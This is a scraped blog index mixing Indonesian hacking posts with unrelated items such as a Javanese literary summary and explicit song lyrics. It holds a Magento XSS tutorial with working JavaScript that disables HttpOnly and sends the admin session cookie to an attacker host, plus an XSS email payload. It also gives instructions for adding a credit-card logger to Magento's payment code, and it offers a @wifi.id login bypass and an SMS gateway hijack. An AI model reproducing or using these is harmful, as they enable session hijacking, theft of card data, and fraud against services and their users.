Recent Posts

BOT Like LINE Home Feeds [Google App Script]

Here is a Google apps script to automatically liked post on your own home feeds / timeline.

https://script.google.com/d/1fbpAdfAat92n5I113g2E0l21tqO_95_w9ScBCtGt6EjqCLMJakDMvuTc/edit?usp=sharing


Steps
  • Click on the link above and sign in with your Google account.
  • Open "File" menu, choose "Make a copy".

  • Replace "nama" values with your name and "kuki" values with your LINE account cookies (read instructions) etc. How to get LINE cookies in the next step.
  • You may need to run a function "cekAkun()" to check whether the account is valid.
  • Then check the log when the function was run.
  • You can set the script to run automatically by setting the "Current project trigger" on the "Resources" menu.
How to get LINE cookies from browser
  • First, you must allow your LINE account to login via PC (in the next step).
  • Go to https://timeline.line.me and sign in with your LINE account.
  • Press F12 on keyboard.
  • Refresh page (F5).
  • Copy the value of cookies in your browser.
  • Network > Choose one request at a domain timeline.line.me > Headers (on the right panel) > Request headers > Copy the cookies value from "Cookie" request header.
Firefox:
BOT Like LINE Home Feeds [Google App Script]

Chrome:
BOT Like LINE Home Feeds [Google App Script]


How to allowing logins to the PC version of LINE
Please configure your login settings on your smartphone using the steps below:
  • Go to More > Settings > Account.
  • Tap Allow Login.

You can also open this menu by tapping this link from your smartphone.

How to set emoticons like
To set emoticons of like (default: null, if you want to set the emoticon randomly).

= 1

= 2

= 3

= 4

= 5

= 6


Change the null value of the variable 'tipe' (on line 9) with numbers above if you want to change the type of emoticons like.


Just write down in the comment section below if you have any curiosity about this, cause curiosity has its own reason for existence you know. (:

@wifi.id Bypass Login (2016) [APPS]

Hell yeah, kembali lagi bersama saya, setelah sekian lama tidak berjumpa. Pasti sudah lama dinanti-nanti? :P

@wifi.id Bypass Login (2016)
(Apps @wifi.id Bypass Login Preview)



Tanpa berbasa-basi, berikut adalah cara menggunakan aplikasinya.
 
  • How 
- Pastikan Anda tersambung pada jaringan SSID @wifi.id
- Lalu Anda juga belum mengotorisasi/login pada @wifi.id
- Buka http://8.8.8.8/ atau apapun pada browser, sehingga URL meranah ke halaman utama @wifi.id
- Salin (Copy) URL halaman utama @wifi.id pada address bar dan letakan (Paste) ke kolom 'Default URL' pada aplikasi
- Kemudian klik tombol 'Hajar!' pada aplikasi
- Cek ping ke google.com untuk mengecek apakah sudah mendapatkan akses internet.

Jika masih belum jelas pada tutorial di atas, Anda dapat melihat video tutorial di bawah ini:



Requirement :
- OS Windows
- .NET Framework 4.0 (or high)

Virus Total: https://www.virustotal.com/id/file/4fa673....
Download : http://www.mediafire.com/download/hryoyj....  108 KB (111,104 bytes)




Oke, mungkin cukup sekian postingan kali ini tentang bypass login @wifi.id, semoga bermanfaat.
Sekian dan terima kasih.



"Sombonglah dengan pakaianmu sendiri."

Serat Centhini

http://baltyra.com/wp-content/uploads/2011/02/aksarajawa-seratcenthini.png


Ki Sali ing Laweyan nglajengaken katrangan bab Jangka Jayabaya, wiwit jaman Kalawisesa ing jaman Pajajaran dumugi jumenengipun turun Sultan Erusakra ing Ngamartalaya ngantos dumuginipun Kiyamat Kobra (kaca 1 - 6). Kasambet katranganipun Ki Atyanta bab Kiyamat Kobra miturut Hadis kanthi pratandha ngalamat warni 40.

Sabibaripun, Mas Cebolang nglajengaken lampah dumugi ing Majasta kapanggih Ki Jayamilasa (jurukunci pasareyan Jaka Bodho putra raja majapait ingkang ngrungkebi agami Islam). Lajeng sami jiyarah ing pasareyan Majasta.

Ing Sapinggiring lepen Dengkeng wonten wit asem ing tengahipun menggik alit. Miturut Ki Jayamilasa wit asem wau ing jaman kinanipun kangge nancang gethekipun Jaka Tingkir. Lajeng kabeberaken babadipun Jaka Tingkir nalika badhe
suwita dhateng Demak, numpak gethek. Lerem ing Majasta, gethek kacancang wit asem ingkang tilasipun taksih katingal pingget alit ing tengah wau (kaca 48 - 55).
Lampahanipun dumugi sendhang Banyubiru ingkang rumiyinipun papan mejang ngelmu raos, sarta sami ningali siti ingkang kaangge Jaka Tingkir anggala maesa. Maesa ngamuk, ingkang saged nyepeng namung Jaka Tingkir. Lajeng sami jiyarah ing astana Banyubiru. Mas Cebolang kapengin kapanggih Seh Hersaranu, dumadakan mireng suwanten

bilih sagedipun kapanggih Seh Hersaranu benjing menawi sampun emah-emah wonten ing Wanataka (kaca 60 - 61). Lampahipun dumugi dhusun Teleng sumerep sendhang Tirtamaya. Miturut kaol, sinten ingkang adus ing sendhang cacah sanga ing laladan ngriku, mangka rampung saderengipun pletheking surya, yekti teguh timbul tuwin yuwana. Lumampah mangetan tumuju dhateng Pacitan.

Ing Girimarta kapanggih Endrasmara, putranipun Ketib Winong ing mataram, ing ngayeng badhe ngaos dhateng
Panaraga kandheg ing Girimarta sesemah Rara Indradi putranipun Kyai Haji Nurgirindra. Endrasmara mila karem ulah asmara, semahipun sakawan sami rukun. Ing dalunipun rerembegan bab gesang lan panggesanganing manungsa tuwin ihtiyaripun.

Nyandhak kawruh tasawuf lan fekih, Endrasmara milih fekih ingkang mupakat kanggenipun tiyang Jawi. Endrasmara medhar bab pratingkahing cumbana tuwin sipat-sipating wanita dalah panggigahing napsu asmara. Kyai Haji Nurgirindra ngawontenaken pengetan Maulud Nabi ngundang Mas Cebolang mirengaken katrangan bab Asma’ulhusna
(Asmaning Allah) tuwin khasiatipun (kaca 76 - 88).
Mas Cebolang dalah para santrinipun dherek Haji Nurgirindra dhateng griyanipun Nyai Wulanjar Demang ing Paricara ingkang ngawontenaken wilujengan pendhak geblagipun Ki Demang. Mas Cebolang ingkang katedha terbangan kanthi beksan, sengaja namur dados pawestri nama Ken Suwadi. Bokmas Demang sakalangkung kapranan dhateng Ken Suwadi, mila katedha nyipeng. Panamuripun Mas Cebolang sakalangkung remit; ing dalu badhar sanyatanipun,
ewadene malah dados pirenanipun Nyai Demang, lajeng posah-pasihan (kaca 89 - 120).

Dumugi dhusun Karang kapanggih Ki Darmayu ingkang ngreksa tumbalipun tanah Jawi. Tumbal wau wonten ing astana
Genthong, ingkang kalangse monten pethak. Tumbal ing salebeting genthong wujud balung sajempol, panjangipun sakilan (kaca 124 - 130).

Kapanggih rombonganipun Brahmana Sidhi saking Hindhustan ingkang badhe nyantuni monten langsening tumbal. Sang Brahmana wawanrembag kaliyan Mas Cebolang, ngandharaken bab gegebenganipun Kabudhan, inggih punika tataning siswa dumugi guru, ajaran gesang tumimbal, tanha, karma, cakramangggilingan, pambirating panandhang, gegayuhan ing dalem kasampurnaning Buddha, ilmu tuwin laku lan sanes-sanesipun (kaca 131 - 146).

Wondene Mas Cebolang ngandharaken isinipun Serat Rama bab kautamenipun Wibisana tuwin Kumbakarna. Sang Brahmana nyariosaken lalampahanipun Sultan Abdulkarim Kubra ingkang nyikara tiyang mlarat, wasana Sultan sirna dalah sadaya abdinipun jalaran sami boten purun nilar Sang Prabu ingkang nandhang dosa, kadosdene pakartinipun sang Wibisana (kaca 149 - 151). Mas Cebolang nyariosaken piwulangipun Sri Rama sasampunipun kundur dhateng Ayodya inggih punika bab lepasing jiwa ingkang patitis (kaca 152 - 154).

Sabibaripun punika, Mas Cebolang dalah santrinipun nglajengaken lampah, nyabrang lepen sumerep sawatawis wanita sami gegujengan angujiwat. Dumugi dhusun Selaung kapanggih Patinggi Ki Nursubadya sarta lajeng sipeng ing
griyanipun. Ingkang ngladosi tamu sadaya tiyang estri jalaran ing Selaung tiyang jaler sami ngumbara dados warok,
remen gegemblakan, tebih dhateng tiyang estri, pangangge lan tingkahipun nelakaken sarwi sesongaran, ngendelaken dhug-dhengipun.

 


Referensi :
- Wikipedia Indonesia
- Sumahatmaka, R.M.A, Ringkasan Centini (Suluk Tambanglaras), PN Balai Pustaka, Cetakan pertama, 1981.
- Yatim, Dr. Badri, MA, Sejarah Peradaban Islam, PT Raja Grafindo Persada, Ed. 1, Cet. 12, 2001
- H Karkono K Partokusumo

How to Deal (means Block) with Telkom Ads?



  • What It's?

Saya harap, Anda di sini sudah mengetahui kasusnya. Silahkan baca TELKOM Indonesia Secretly Injects Advertisements.

Singkatnya, cara kerja script tersebut adalah ketika Anda menggunakan browser yang sudah terinjeksi script seperti gambar di atas untuk membuka halaman situs tertentu, maka script tersebut akan memaksa browser untuk memuat halaman dari sumber script di *.u-ad.info dan menampilkan perintah script ke halaman yang sedang Anda buka. Itulah sebabnya, kenapa kecepatan browsing Anda sedikit melambat dan tampil tayangan iklan tertentu di luar konten dari website yang sedang Anda baca. Ini hanya hanya muncul pada setiap situs non-HTTP.



  • How to Deal?

Ada beberapa cara untuk mengatasi gangguan yang disebabkan oleh script ads inject dari *.u-ad.info, diantaranya adalah;

1. Menggunakan VPN (Virtual Private Network)
Advertising inject yang dilakukan oleh Telkom tidak berdampak ketika Anda menggunakan VPN. Sebab VPN merupakan jalur koneksi yang terenkripsi, seperti halnya dengan HTTPS.

2. Menggunakan SSH (Secure-Shell) Tunelling
Kurang lebih metodenya sama seperti menggunakan VPN, yaitu untuk membuat jalur koneksi yang terenkripsi.

3. Melakukan Filtering Terhadap Host
Jika Anda menggunakan Windows, ubah filter hosts pada folder C:\Windows\System32\Drivers\etc, ranahkan *.u-ad.info pada 127.0.0.1. Atau router yang Anda gunakan memiliki fitur blocklist, lakukan pemblokiran sebagai berikut;



4. Pencegahan dari Ads Inject
Jika Anda adalah web developer, lakukan pencegahan dari ads inject dengan cara menggunakan tag body yang berbeda, seperti gambar di atas.

5. Menggunakan Greasemonkey Script
Greasemonkey adalah pengaya browser yang memungkinkan pengguna untuk menginstal script yang membuat perubahan untuk konten halaman web setelah atau sebelum halaman dibuka di browser.
Perubahan yang dibuat ke halaman web yang dieksekusi setiap kali halaman ditampilkan, membuat mereka efektif permanen untuk pengguna menjalankan script.

Pertama, install: https://addons.mozilla.org/firefox/addon/748, for Chrome: https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en

Kemudian install userscript ini: https://openuserjs.org/scripts/dwi.siswanto/Telkom_Ads_Blocker

Jika sudah, silahkan uji coba dengan menjalankan script di bawah ini pada server lokal:


Terdapat perbedaan jika Anda belum menginstall userscript di atas, maka frame URL yang ditampilkan akan tak tersedia (404/not found) atas cfs.u-ad.info, sebaliknya jika Anda telah menginstall maka frame URL akan tak tersedia atas 127.0.0.1.


Deal? Thanks and please share. :)

[TUTS] Let's Exploit Magento! (<= 1.9.2.3)

Why?

A friend of mine sent me an interesting advisory the other day, demonstrating that there was an XSS exploit for the eCommerce platform Magento. I like security advisories, mainly because it's an interesting challenge and a good way to learn more about the underlying frameworks you're using. Since it was a lot of fun to exploit wordpress, I figure'd I'd try out this XSS exploit. It should go without saying, but don't try this on systems that aren't yours, or you'll be violating the law.

The plan

As pointed out in the interesting advisory, this is a flaw that has to be triggered by an administrator checking on an order. So in our pretend scenario we have two types of exploits going on:

  1. Taking advantage of the vulnerability itself
  2. Convincing the admin to check your order

Both of these are likely to be fairly easy given the nature of Magento. Calling or emailing an adminstrator in reference to your order would get any well-intentioned admin to check it out. And the first is trivially done according to the advisery by using the quoted form of an email address for your client account. So our attack plan is simple:

  1. Setup our server to receive information
  2. Perform exploit and call up our friendly admin
  3. Steal their credentials or perform actions under their name

Setup

First off, we need to download a version of magento that isn't patched, so we can grab any copy of magento that is less than 1.9.2.3 from the downloads page. I had to create an account to download the software, so do that if you need to (use guerrillamail if you need a quick email address to use). Then setup magento. In my case I'll be using apache with the following host setup:

# My New Magento Install! Nothing bad could happen :D 
<VirtualHost *:80>
    Servername local.magento.sec
    ErrorLog /tmp/error.log
    DocumentRoot /path/to/magento
    <Directory /path/to/magento >
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

#My Evil domain that will exploit the poor thing:
<VirtualHost *:80>
    Servername local.evil.sec
    CustomLog /tmp/exploit.log combined
    DocumentRoot /tmp
    <Directory /tmp >
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

And then setup your hosts file appropriately:

127.0.0.1 local.magento.sec local.evil.sec

And starting up apache and navigating to your local site should give you the installation screen and you can follow the instructions to setup magento. In my case, I had to update some permissions and install the php5-gd package on my system before being able to run magento. Your mileage may vary. Also, installing magento is slow, the database has over 300 tables in the base install, be patient as you install it.

Once you're setup, you should be able to log in to your admin panel and see that magento wants to update:

Ignoring that, create a product or two and verify that your site is working properly.

Confirming the exploit

Before we do anything complicated, we want to perform a smoke test to make sure that we can trigger the problem ourselves. We'll do the same test that the advisory did and simple alert on the page by using the email "><script>alert(1);</script>"@sucuri.net. When you do this from the checkout page you'll get an error saying you it's not a valid email. However, this is only a front end check that we can trivially avoid by editing the HTML and removing the attributes the JS relys on to validate:

Click through the rest of the steps and place your order.

Then in the admin panel navigate to sales and your orders and verify that the exploit happens:

You'll see the pop-up twice before the page fully loads. Now the real question is what can we do?.

Getting dirty

The first thing that comes to my mind is to attempt to steal the session of the admin user. But a quick look at the cookies of the page will tell us that such a thing won't work since the cookies are HTTP-Only:

So that's seems like a dead end at first, but we can actually change the settings for these cookies from magento! The HTTP-Only setting is configured from the Web section of the System configuration page, and by default is turned on:

So the question becomes, how can we get to this page using our exploit? First off, we'll note that the navigation bar has an id of nav. So that's trivial to get via javascript:

var nav = document.getElementById('nav')

And once we do that it's simple to note that the navigation consists of links like the following:

<li class="  last level1">
    <a href="http://local.magento.sec/index.php/admin/system_config/index/key/d1b178d00a7755670c57af7f3f59bfa3/" class=""><span>Configuration</span></a>
</li>

We can't get much from the link itself, but the internal span tells us everything we need to know. Leveraging this:

var spans = nav.getElementsByTagName('span')
for(i in spans) { 
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent == "Configuration") { 
        configLink = spans[i].parentElement.href
    } 
}

And now we have the correct link to follow stored in configLink. Since magento uses prototype we can perform AJAX requests for pages pretty easily:

var configPage = document.createElement('span')
configPage.display = 'None';
new Ajax.Updater(configPage, configLink, {method: 'get'})

This will call up the system page which has another link we need. The HTTP Only settings are in the Web settings, so we'll find that link in the new page and then proceed from there: 

var spans = configPage.getElementsByTagName('span')
for( var i = 0; i < spans.length; i++) {
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.indexOf("Web")!=-1) { 
        webConfigLink = spans[i].parentElement.href
    } 
}
var webPage = document.createElement('span')
webPage.display = 'None'
new Ajax.Updater(webPage, webConfigLink, {method: 'get'})

Once we have this page we're nearly there. We just need to select the correct option for HTTP cookies and then submit the form. This is easy enough to do programmatically since the option has an id:

//Get the select menu:
var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0]

//Set the options to No
for(var o = 0; o < select.options.length; o++) {
    select.options[o].value = 0 //set it to the 'No' value easily
}

//Grab that form
var form = webPage.getElementsByTagName('form')[0]
//Submit it via Ajax using prototype so the admin doesn't know
$(form).request({
    onFailure: function(){}, 
    onSuccess: function(t){
        //wait for it...
    }
})

Now that we've done that the HTTP-Only flag on the cookies is gone, which means that we can steal the admin's session.

To send the session to the hacker we'll use our second virtual host and the oldest trick in the book, the access log! Updating the wait for it part of our form handler code gives us the final step to our hijack:

onSuccess: function(t){
    var logPage = document.createElement('span')
    var evil = 'http://local.evil.sec?' + document.cookie
    logPage.display = 'None'
    new Ajax.Updater(logPage, evil, {method: 'get'})    
}

Once you do this, you'll see the admin cookie appear in the log file of the hackers domain:

Once we've got this, we just do a simple cookie setting and we're good to run wild. First go to the admin page and open up your console. Then set the document to be the value sent in your request:

Refresh the page and you'll have access to the admin console:

Putting it all together

It's easy to write all the above into the console to verify that it works, but it's another thing to actually use the email exploit to run the code. We have two options:

  1. Insert all that code into the email address
  2. Have the email address inject a script to handle things for us

Either way we need to wrap the code into a single package so let's do that:

/** Helpers */
function findLinkInSpan(spans, search) {
    for(i in spans) { 
        if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.trim() == search.trim()) {
            return spans[i].parentElement.href;
        } 
    }
}

/** Wait for the AJAX to stick the data into our target element */
var waitingTime = 3000;

function exploitOrderPage() {
    /** Navigate the menu */
    var nav = document.getElementById('nav');
    var spans = nav.getElementsByTagName('span');
    configLink = findLinkInSpan(spans, "Configuration");

    /** Global for exploitConfigPage to use */
    configPage = document.createElement('span');
    configPage.display = 'None';
    new Ajax.Updater(configPage, configLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitConfigPage()
                }, waitingTime); 
            }
        }
    );
}

function exploitConfigPage() {
    var spans = configPage.getElementsByTagName('span');
    var webConfigLink = findLinkInSpan(spans, 'Web');

    /** Global for exploitWebPage to use */
    webPage = document.createElement('span');
    webPage.display = 'None';
    new Ajax.Updater(webPage, webConfigLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitWebPage();
                },waitingTime);
            }
        }
    );
}

function exploitWebPage() {
    var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0];
    for(var o = 0; o < select.options.length; o++) {
        select.options[o].value = 0; //set it to the 'No' value easily
    }
    var form = webPage.getElementsByTagName('form')[0]
    //Submit it via Ajax using prototype so the admin doesn't know
    $(form).request({
        onFailure: function(){}, 
        onSuccess: function(t){
            var logPage = document.createElement('span');
            var evil = 'http://local.evil.sec?' + document.cookie;
            logPage.display = 'None';
            new Ajax.Updater(logPage, evil, {method: 'get'});
        }
    })
}

/** On load we want to hide the weird email from the admin and steal! */
var anchors = document.getElementsByTagName('a')
for(var i = 0; i < anchors.length; i++) {
    if(anchors[i] && anchors[i].href == 'mailto:') {
        anchors[i].textContent = 'user@example.com';
    }
}
//GO!
exploitOrderPage();

The code is a little rough because we have a series of callbacks that fire as the pages are loaded into the target divs by prototype. In my testing it seemed like there was enough delay between when the request completed and when variables like configPage were filled with data that a timeout was the only way to ensure that there was data available to iterate over with .getElementsByTagName.

Note that even though we don't have any CORS headers on our evil domain, we don't actually need them to get the credentials in our log file since the preflight request will show up in the log. If you were a real attacker trying to be silent, you'd likely adjust your server accordingly.

So let's try the first tactic, putting all of the code into an email address in the checkout form:

And editing the HTML with the inspector to remove the validation from the element results in

And checking out the magento source it looks like the length calculation is pretty small:

//lib/Zend/Validate/EmailAddress.php
 if ((strlen($this->_localPart) > 64) || (strlen($this->_hostname) > 255)) {
    $length = false;
    $this->_error(self::LENGTH_EXCEEDED);
}

So it seems like the first attempt is out since the full script can't be fit into 64 characters. So instead let's try to load it from our evil domain! We can do this by saving our script to a.js and loading it via a script tag with the malicious email:

"<script src='//local.evil.sec/a.js'></script>"@exploited.net

This comes in at 47 characters, so if you're testing with a longer local domain name then a link shortener would be a good idea. Or if you don't mind whiting out most of the screen you can drop seven characters by removing the closing <script> tag (though that makes the attack more obvious).

Submit your order after filling out the rest of the fields:

Navigating from our admin window to the new order, we'll be greeted with our usual screen, but if we open up the console in a few seconds we'll start to see the effects of the attack:

And in our log files:

Using this value we can then update our cookie from our hackers perspective:

Then simply click in the url and navigate to /admin and you've successfully broken into a magento site using an exploit and session hijacking!

So what now?

Now you go and you update magento so that you don't run into someone pulling this trick on you! The last thing you need is a random user getting access to customer information, saved credit cards, or anything like that! Just browsing through the configuration screen's it's easy to see multiple attack vectors that one could use to install back-doors to the system so that even after they upgrade, the attack can still get in.

Security is important, and I've written this post so that if anyone is using an old version of magento in production they can go to their boss, demonstrate the attack here, and get their blessing to spend as much time as neccesary in patching their system. It's not always fun to upgrade when we could be developing, but doing so keeps the entire internet healthy (you don't want your servers or clients helping out with a DDoS do you?). So get out there and patch!

Obvious Disclaimer

In case it's not obvious This is example code meant for educational purposes only. Do not run this on any machine you do not own! It is a violation of both state and federal law that often carries a hefty fine. Just don't do it.


Source: http://www.plasticsurgery.whoseopinion.com

[SCRIPT] OpenVPN Config Grabber from VPN Gate

OpenVPN Config Grabber from VPN Gate 


First, you must install OpenVPN Client. Download here!

Than, look bellow.
script;



Usage; Open this PHP script with a browser.
Config will be saved into your document root of htdocs directory (if you're using XAMPP, means Apache server).


Proof;
OpenVPN Config Grabber from VPN Gate

CMS Detector, More Than 50+ CMS to Detect

CMS detector
(CMS Detector preview in Windows)

Sometimes, for whatever reasons, you will want to know if a website is using a content management system (cms), and if so, which one. 
This is a rather complicated procedure, but we did our best to collect in our service the maximum number of features that can help define a website's cms.

What's CMS?
From the Wikipedia, a content management system (CMS) is a computer application that supports the creation and modification of digital content using a common user interface and thus usually supporting multiple users working in a collaborative environment. CMSes have been available since the late 1990s.

CMS features vary widely. Most CMSes include Web-based publishing, format management, edit history and version control, indexing, search, and retrieval. By their nature, content management systems support the separation of content and presentation.

How to identify which CMS is used on a website?
This tool will analyze websites and attempt to detect the plaform, language, framework and other technologies used for any website.
usage; this.php <host>



This is an experimental service, please contact us if any problem occurs or if you think a site has been wrongly detected.

[TUTS] How to Add CreditCard Logger in Magento?

Proof of Concept


First, you must exploit Magento site.
Here's auto exploiter script written by my homies FathurFreakz[coder]



File: app/code/core/Mage/Paygate/Authorizenet.php

$payment->getOrder()->getBillingAddress(); // Billing Address
$payment->getCcType(); // CC Type
$payment->getCcOwner(); // Cardholder Name
$payment->getCcNumber(); // CC Number
sprintf('%02d-%04d', $payment->getCcExpMonth(), $payment->getCcExpYear()); // CC Expire
$payment->getCcCid(); // CC CVV


Just add mail() function inside _place() function between self::RESPONSE_CODE_APPROVED:.
Regards :)

8 Ball - Burung di Gunung (feat. N.Y.C.O)




Lyric 8 Ball - Burung di Gunung (feat. N.Y.C.O)

* Chorus
Di tengah gunung terbang lah burung
Terbangnya lama gak nanggung-nanggung
Sayapnya patah masuk ke dalam kawah
Kawahnya enak laharnya tumpah

* Verse 1
Yang ku rasakan tentangmu itu enak
Bikin nagih kalo ditinggalin sejenak
Bekasnya nyisa meskipun jauh
Demi ketemu jarak akan ku tempuh

Itumu ampuh aku bersimpuh
Kena sekali ngejar kaki berasa lumpuh
Tetesan keringet bulet-bulet
Dalam dekapanmu tuh sungguh anget

Yang atas bentuknya nongol montok
Yang bawah masuk ke dalem mentok
Pengen terus notok karena gelisah
Kelamaan diinget aja bikin ku basah

Selalu buat badan ku gemeter
Deket kamu bawaannya tuh mak ser
Pikiran muter gak mandek-mandek
Sampe gak peduli yang lain kaya budeg

* Back to Chorus

* Verse 2
Di otak ku tuh kamu nyantol
Candu kamu tuh aku getol
Keras kon...disi karena jarak
Jadi mem...ang wajar besar gejolak

Sulit mengelak datang mendadak
Ok deh, oh iya, oh tidaaaaak
Walau kesel dah susah amnesia
Ingat gerak enak sembuhkan hipotermia

Yang nggantung nyembul, yang ujung timbul
Belakang bawah mumbul depan lembut anget gak ngepul
Dekat merapat lekat makin nancep
Ngucur keringat peluk erat mantep mak jleb

Makin dalem makin cepet harum lupa apek
Anuku isi anumu penuh sesak sumpek
Pokoknya anu kita "plek plek plek"
Dan akhirnya dikau daku glipak-glipek

* Back to Chorus

Di tengah gunung terbang lah burung
Terbangnya nakal gak pake sarung
Sayapnya patah masuk ke dalam kawah
Kawahnya enak laharnya tumpah

* Ending
Tumpah
Tumpah
Tumpah
Tumpah

[SCRIPT] Bot RSS Feeds Transferer to Facebook

Bot RSS Feeds Transferer to Facebook? Hah? Apaan ya?
Mungkin ada yang belum kenal dan ada juga yang sudah tidak asing lagi.
Pernahkah Anda melihat sebuah website yang terdapat logo atau kata-kata RSS? Jawabannya adalah "ya!". Kebanyakan ketika kita membuka sebuah website atau mengunjungi blog, terdapat fasilitas RSS. Sebenarnya apa sih RSS itu? Dan apa kegunaannya?

 RSS adalah sebuah file berformat XML yang digunakan untuk sebuah situs web atau blog (Sumber : http://id.wikipedia.org/wiki/RSS). Singkatan dari RSS ini mengacu kepada beberapa protokol, diantaranya :
  • 1. Really Simple Syndication (RSS 2.0)
  • 2. RDF Site Summary (RSS 0.9 dan 1.0)
  • 3. Rich Text Summary (RSS 0.91)
Pengertian sederhana dan kegunaannya adalah teknologi yang memudahkan kita untuk mendapat informasi terbaru dari web atau blog tersebut, tanpa kita harus membuka web tersebut.

 Kemudian, apa itu feed? Feed adalah pengumpul untuk mengecek situs yang menyediakan RSS dan menampilkan berbagai artikel baru yang ditemukan. Feed ini bisa berupa program komputer atau layanan yang berbasis online.

 Untuk dapat menggunakan RSS ini tidak sulit. Ya, iyalah! Jaman sekarang apa sih yang sulit? Wong tinggal klik-enter-klik-enter doang, bikin tangan robot aja (katanya) mudah kok.

 Tapi di sini bukan bagaimana cara menggunakan RSS dan bagaimana membuat tangan robot tersebut, melainkan bagaimana cara meng-update informasi terbaru dari web atau blog yang dituju ke Facebook yang telah saya aplikasikan dalam bahasa PHP.
Ini sama halnya seperti aplikasi pada umumnya yang bertebaran di Facebook jika kita mencari RSS pada kategori aplikasi.
Bot RSS Feeds Transferer to Facebook Review

Yang perlu Anda siapkan di sini adalah;
  • 1. Kuki Facebook (How to get?)
  • 2. User ID atau Grup ID target yang ingin ditransfer
  • 3. Daftar RSS feeds

Orkes, langsung saja. Ini dia skripnya.
rss-bot.php



Note
2. define("COOKIES", "...");
Inputkan semua kuki Facebook (pisahkan setiap parameter dengan titik koma ';'). Ini untuk mendapatkan otorisasi ke rest API Facebook dengan akses token baru yang diminta tiap kali dijalankan.
3. define("TARGET", "");

 Ini tidak berlaku jika Anda ingin mentransfernya pada kronologi Anda sendiri (dapat dikosongkan), nilai default adalah: me.
4. define("LOG", "rss-log.txt");
Disarankan untuk membuat file kosong dengan nama yang sama pada kode yang tertulis, guna untuk menghindari duplikat status yang sudah diposting.
12. $rss = array(
         ...
    );
Jika demikian Anda ingin mengatur atau mengubah daftar RSS feeds, silahkan saja. Dengan syarat url RSS feeds tersebut sah (ext:XML).

 Rekomendasi trigger yang disarankan adalah 1x5 jam.
Mungkin cukup tau sampai di sini saja ya? Jika ada yang menghadapi kegagalan bermasturbasi, luapkan dikomentar.
Terima kasih. ^^

[SCRIPT] Bot Twitter Reply by SimSimi

Bot Twitter Reply by SimSimi reviewBot Twitter Reply by SimSimi review
A few months ago, there is a wants to be made by me about the bot replies tweet (by simsimi). Sorry could only reply to the request at this time. Hihihi.



What it SimSimi? Previously I've explained the definition of simsimi on the post Bot Telegram SimSimi. So, at this point I don't need to be long-winded.

 First, download TwitterOAuth PHP Library by Abraham.

Than you need consumer key, consumer secret, token key and token secret. You can find them at Twitter Application Management.


bot.php


 Note
17. define('LANG', 'en');
On line 17 is the language used to reply tweet by simsimi. (Can't be blank)
Available az (Azerbaijani), de (Dutch), en (English), fr (French), it (Italian), pt (Portuguese), ru (Russian), es (Spanish), tl (Tagalog) and tr (Turkish).
18. define('LOG', 'log.txt');
On line 18 defines as a log for the tweets that have been returned, in order to avoid duplicates.
23. $tuit = ambil("statuses/mentions_timeline", array("count" => "1"));
And the variable $tuit on line 23 that calls the function ambil(). Count is the number of tweets to be taken (mention). Recommend; 5.

I think it's enough, if you have questions or problems in the code, please comment. :)

[TUTS] SMS Gratis ke Indonesia Gateway Hijack

My gateway server of victim is; smsgratis2indonesia{dot}co{dot}id
Let see how it's works!

SMS Gratis ke Indonesia Gateway Hijack Preview
(SMS Gratis ke Indonesia Gateway Hijack 1.0)


# usage; http://localhost/this.php?no={victim/target number}&text={your text}



Subscribe to: Posts (Atom)